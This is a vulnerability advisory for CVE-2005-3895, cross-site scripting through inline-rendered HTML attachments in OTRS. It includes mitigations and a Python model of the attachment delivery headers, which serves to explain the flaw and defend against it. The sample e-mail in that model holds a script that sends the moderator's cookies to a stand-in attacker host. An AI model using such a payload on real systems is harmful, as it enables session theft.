PT-2005-5582 · Otrs +1

Moritz Naumann · Published 1970-01-01 · Updated 2017-07-20 · CVE-2005-3895

CVSS v2.0: 7.5 (High)
Vector: AV:N/AC:L/Au:N/C:P/I:P/A:P
Name of the Vulnerable Software and Affected Versions
Open Ticket Request System (OTRS) versions 1.0.0 through 1.3.2
Open Ticket Request System (OTRS) versions 2.0.0 through 2.0.3
Description
OTRS stores the e-mail attachments that arrive with tickets and lets queue moderators download them through the web front end. When the AttachmentDownloadType setting is "inline", a text/html attachment is delivered for display in the browser (Content-Disposition: inline) instead of as a file download, so a remote attacker who submits a ticket with a crafted HTML attachment gets arbitrary web script or HTML executed in the moderator's authenticated browser session as soon as the moderator opens the attachment. The issue is classified as cross-site scripting (XSS). The Debian advisory listed under related identifiers (DSA-973-1) covers multiple vulnerabilities in the otrs package of Debian GNU/Linux that can be exploited remotely, leading to a violation of the confidentiality, integrity and availability of protected information.
Recommendations
For all affected releases (OTRS 1.0.0 through 1.3.2 and 2.0.0 through 2.0.3), set AttachmentDownloadType to a value other than "inline" so that text/html e-mail attachments are offered as file downloads rather than rendered as HTML in the moderator's browser. This is a configuration mitigation that changes how attachments are delivered; it does not patch the application. Debian users should apply the otrs update from DSA-973-1, listed under related identifiers. At the time of this entry, no upstream release containing a fix for this vulnerability is recorded here.
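A model of the delivery decision behind this issue, added here as an example and not taken from OTRS or from this entry: a constructed ticket e-mail carrying a text/html attachment is parsed, and a hypothetical download handler emits response headers under the "inline" setting and under the "attachment" setting. The function and variable names, the sample message, and the hardened handler's use of application/octet-stream with X-Content-Type-Options: nosniff are assumptions of this example, not OTRS behaviour.

```python
"""Model of the attachment-delivery decision behind CVE-2005-3895.

Added example, not OTRS code: a constructed ticket e-mail with a text/html
attachment is parsed, and a hypothetical download handler shows why the
inline setting lets the attachment run as a page in the moderator's browser
while the attachment setting forces a file download.
"""
import email
from email import policy

# Constructed sample message (not a real capture): a ticket submitted by an
# outside party whose attachment is an HTML file with an embedded script.
RAW_TICKET_MAIL = b"""\
From: customer@example.invalid
To: support@example.invalid
Subject: Invoice question
MIME-Version: 1.0
Content-Type: multipart/mixed; boundary="b1"

--b1
Content-Type: text/plain

Please see the attached invoice.
--b1
Content-Type: text/html; name="invoice.html"
Content-Disposition: attachment; filename="invoice.html"

<html><body>
<script>new Image().src = "http://attacker.invalid/?c=" + document.cookie;</script>
</body></html>
--b1--
"""

# Media types a browser will render as a page (and execute script from).
RENDERABLE_TYPES = {"text/html", "application/xhtml+xml"}


def extract_attachments(raw):
    """Return (filename, content_type, payload_bytes) for each attachment."""
    msg = email.message_from_bytes(raw, policy=policy.default)
    return [
        (part.get_filename(), part.get_content_type(), part.get_payload(decode=True))
        for part in msg.iter_attachments()
    ]


def download_headers(content_type, filename, download_type):
    """Response headers a download handler emits for one attachment.

    download_type mirrors the AttachmentDownloadType setting named in the
    advisory: 'inline' (the vulnerable setting) or 'attachment'.
    """
    if download_type not in ("inline", "attachment"):
        raise ValueError("download_type must be 'inline' or 'attachment'")
    headers = {"Content-Disposition": f'{download_type}; filename="{filename}"'}
    if download_type == "inline":
        # Vulnerable: the attachment's declared type is passed through, so a
        # text/html part is displayed, and its script executed, inside the
        # moderator's authenticated session.
        headers["Content-Type"] = content_type
    else:
        # Hardened (assumption of this example, not OTRS behaviour): force a
        # download and stop the browser from sniffing a renderable type.
        headers["Content-Type"] = "application/octet-stream"
        headers["X-Content-Type-Options"] = "nosniff"
    return headers


def renders_in_browser(headers):
    """True when a browser would display the response as a page."""
    disposition = headers["Content-Disposition"].split(";")[0].strip().lower()
    media_type = headers["Content-Type"].split(";")[0].strip().lower()
    return disposition == "inline" and media_type in RENDERABLE_TYPES


def audit(raw, download_type):
    """Map each attachment in raw to whether it would execute as HTML."""
    return [
        (filename, renders_in_browser(download_headers(ctype, filename, download_type)))
        for filename, ctype, _payload in extract_attachments(raw)
    ]


if __name__ == "__main__":
    for setting in ("inline", "attachment"):
        print(setting, audit(RAW_TICKET_MAIL, setting))
```

audit(RAW_TICKET_MAIL, "inline") flags invoice.html as renderable, while the "attachment" setting does not. The check looks only at the headers the server itself emits, so a Content-Disposition header chosen by the sender inside the mail has no influence on the outcome; that is the property the recommended setting change relies on.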

Related identifiers

BDU:2015-03039
BDU:2015-03040
BDU:2015-03041
CVE-2005-3895
DSA-973-1

Affected products

Debian
Otrs